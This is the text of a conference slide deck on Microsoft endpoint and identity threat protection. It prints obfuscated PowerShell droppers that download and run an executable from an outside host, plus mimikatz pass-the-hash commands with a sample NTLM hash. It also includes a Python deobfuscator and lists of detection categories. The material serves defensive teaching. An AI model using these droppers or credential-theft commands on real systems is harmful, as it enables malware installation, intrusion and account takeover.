The new era of endpoint security
Alexander Benoit
Microsoft MVP Enterprise Security | Certified Ethical Hacker
@ITPirate
Alex Benoit
Lead Security Analyst
Modern Secure Workplace
Microsoft Threat Protection
Alexander.Benoit@sepago.de
@ITPirate | @TrustInTechCGN | @GeekZeugs
https://it-pirate.com/
Microsoft Threat Protection
Obfuscation
((${`E`x`e`c`u`T`i`o`N`C`o`N`T`e`x`t}." `I`N`V`o`k`e`C`o`m`m`A`N`D")."
`N`e`w`S`c`R`i`p`T`B`l`o`c`k"((&(`G`C`M *w=O*)" `N`e`t`. `W`e`B`C`l`i`e`N`T")."
`D`o`w`N`l`o`A`d`S`T`R`i`N`g"('ht'+'tps://bit.ly/XYZ')))

$nsadasd = &('n'+'e'+'w-objec'+'t') random;$YYU = .('ne'+'w'+'-object')
System.Net.WebClient;$NSB = $nsadasd.next(10000, 282133);$ADCX = '
http://aposdiqwpoe.com/BUR/testv.php?l=ando6.yarn'.Split('@');$SDC =
$env:public + '' + $NSB + ('.ex'+'e');foreach($asfc in
$ADCX){try{$YYU."Do`Wnl`OadFI`le"($asfc."ToStr`i`Ng"(), $SDC);&('Invo'+'k'+'e-
Item')($SDC);break;}catch{}
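As an added example (not code from the slides), the Python below undoes the two tricks shown above, backtick insertion and string concatenation, and then checks the normalized text for the download-and-execute indicators a defender looks for. The two obfuscated samples are constructed to mirror the slide's patterns, with example.invalid placeholders instead of the original URLs; the indicator list and the escape-character set are the example's own assumptions.

```python
import re

# Indicator substrings a defender looks for once the obfuscation is peeled off.
INDICATORS = ("net.webclient", "downloadstring", "downloadfile", "invokecommand",
              "newscriptblock", "invoke-expression", "invoke-item", "new-object",
              "start-process")
# Windows PowerShell escape sequences (`0 `a `b `f `n `r `t `v plus quoting characters).
# A backtick in front of any other character is a no-op, which is the trick the slide shows.
ESCAPES = set("0abfnrtv`\"'$")
_CONCAT = re.compile(r"""(['"])([^'"]*)\1\s*\+\s*(['"])([^'"]*)\3""")

def strip_backticks(text):
    """Drop every backtick that does not start a real escape sequence."""
    out, i = [], 0
    while i < len(text):
        if text[i] == "`" and i + 1 < len(text) and text[i + 1] not in ESCAPES:
            i += 1                     # skip the no-op backtick, keep the next char
            continue
        out.append(text[i])
        i += 1
    return "".join(out)

def fold_concat(text):
    """Repeatedly merge 'a'+'b' into 'ab' until no concatenation is left."""
    prev = None
    while prev != text:
        prev = text
        text = _CONCAT.sub(lambda m: m.group(1) + m.group(2) + m.group(4) + m.group(1), text)
    return text

def analyze(script):
    """Normalize one PowerShell one-liner and report what it reveals."""
    stripped = strip_backticks(script)
    folded = fold_concat(stripped)
    lowered = folded.lower()
    return {
        "deobfuscated": folded,
        "backticks_removed": script.count("`") - stripped.count("`"),
        "concats_folded": stripped.count("+") - folded.count("+"),
        # Get-Command with a wildcard (gcm *w=O*) resolves New-Object without naming it.
        "wildcard_lookup": re.search(r"(gcm|get-command)\s+[^)]*\*", lowered) is not None,
        "indicators": [ind for ind in INDICATORS if ind in lowered],
    }

# Constructed samples modelled on the slide's two examples; URLs are placeholders.
SAMPLE_1 = r"""(${`E`x`e`c`u`T`i`o`N`C`o`N`T`e`x`T}."`I`N`V`o`k`e`C`o`m`m`A`N`D")."`N`e`w`S`c`R`i`p`T`B`l`o`c`k"((&(`G`C`M *w=O*)"`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"('ht'+'tps://example.invalid/a'))"""
SAMPLE_2 = r"""$a = &('n'+'e'+'w-objec'+'t') random;$c = .('ne'+'w'+'-object') System.Net.WebClient;$p = $env:public + '' + $a.next(10000, 282133) + ('.ex'+'e');$c."Do`Wnl`OadFI`le"('http://example.invalid/x', $p);&('Invo'+'k'+'e-Item')($p)"""
BENIGN = r"""Get-ChildItem -Path $env:TEMP | Where-Object { $_.Length -gt 1MB }"""

if __name__ == "__main__":
    for name, sample in (("sample 1", SAMPLE_1), ("sample 2", SAMPLE_2), ("benign", BENIGN)):
        r = analyze(sample)
        print(name, r["indicators"], "wildcard lookup:", r["wildcard_lookup"])
```

The counters (backticks removed, concatenations folded, wildcard command lookup) are themselves useful detection features: benign scripts rarely score on any of them.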
protect your data
Sandboxing and detonation
Files in SPO, ODB and Teams: 1st and 3rd party reputation, multiple AV engines
Leverage signals
• collaboration signals: anonymous links, companywide sharing, explicit sharing, guest user activity
• threat feeds: malware in email + SPO, Windows Defender, Windows Defender ATP, suspicious logins, risky IP addresses, irregular file activity
• activity watch lists: users, IPs, on-demand patterns (e.g. WannaCry)
Apply smart heuristics
Covered workloads: SharePoint, OneDrive, Microsoft Teams
protect your data
conditional access
Conditions: users, devices, location, apps, session risk (machine learning)
Policies are evaluated by a real-time evaluation engine to produce the effective policy
Controls: require MFA, allow access, deny access, force password reset, limit access
pass-the-hash
1. mimikatz
2. privilege::debug
3. sekurlsa::logonpasswords
4. sekurlsa::pth /user:Captain
/ntlm:6f0bafeef436381c8d38d106c767f6c8
/domain:itpirate.local
pass-the-ticket
1. krbtgt user’s NTLM hash (e.g. from a previous NTDS.DIT dump)
2. Domain name
3. Domain’s SID
4. Username that we’d like to impersonate
protect your admin identity
protection against identity theft
Attack phases: Reconnaissance, Compromised Credential, Lateral Movement, Privilege Escalation, Domain Dominance
• Account enumeration
• Net Session enumeration
• DNS enumeration
• SAM-R enumeration
• Abnormal working hours
• Brute force using NTLM, Kerberos, or LDAP
• Sensitive accounts exposed in plain text authentication
• Service accounts exposed in plain text authentication
• Honey Token account suspicious activities
• Unusual protocol implementation
• Malicious Data Protection Private Information (DPAPI) request
• Abnormal VPN
• Abnormal authentication requests
• Abnormal resource access
• Pass-the-Ticket
• Pass-the-Hash
• Overpass-the-Hash
• Malicious service creation
• MS14-068 exploit (Forged PAC)
• MS11-013 exploit (Silver PAC)
• Skeleton key malware
• Golden ticket
• Remote execution
• Malicious replication requests
• Abnormal modification of sensitive groups
protection against cloud threats
Malicious insider: protect against disgruntled employees before they cause damage
Ransomware: identify ransomware using sophisticated behavioral analytics technology
Rogue application: identify rogue applications that access your data
Compromised accounts: combat advanced attackers that leverage compromised user credentials
Malware: detect malware in cloud storage as soon as it's uploaded
Data exfiltration: detect unusual flow of data outside of your organization
detection across cloud apps
Detection categories: Indicators of a compromised session, Malicious use of an end-user account, Threat delivery and persistence, Malicious use of a privileged user
• Unusual file share activity
• Unusual file download
• Unusual file deletion activity
• Ransomware activity
• Data exfiltration to unsanctioned apps
• Activity by a terminated employee
• Activity from suspicious IP addresses
• Activity from anonymous IP addresses
• Activity from an infrequent country
• Impossible travel between sessions
• Logon attempt from a suspicious user agent
• Malware implanted in cloud apps
• Malicious OAuth application
• Multiple failed login attempts to app
• Suspicious inbox rules (delete, forward)
• Unusual impersonated activity
• Unusual administrative activity
• Unusual multiple delete VM activity
malware detection
• Scan cloud storage apps
• Identify potentially risky files
Thank You!
ExpertsLiveEurope The New Era Of Endpoint Security

Editor's Notes

  1. https://it-pirate-demo-workspace.atp.azure.com/securityAlert/3c6adc23-9820-4268-9800-12917616d147